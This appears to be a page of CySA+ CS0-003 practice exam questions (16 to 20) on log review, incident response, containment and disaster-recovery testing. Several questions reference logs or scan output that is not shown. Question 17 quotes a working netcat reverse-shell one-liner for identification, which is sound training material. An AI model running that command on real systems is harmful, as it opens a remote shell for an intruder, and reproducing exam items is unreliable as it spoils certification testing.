CS0-003 Exam Question 16

An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.
which are more important than ensuring vendor data access.
Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?
  • CS0-003 Exam Question 17

    A security analyst detected the following suspicious activity:
    rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?
  • CS0-003 Exam Question 18

    An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two).
  • CS0-003 Exam Question 19

    A security analyst reviews the following Arachni scan results for a web application that stores PII data:

    Which of the following should be remediated first?
  • CS0-003 Exam Question 20

    An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?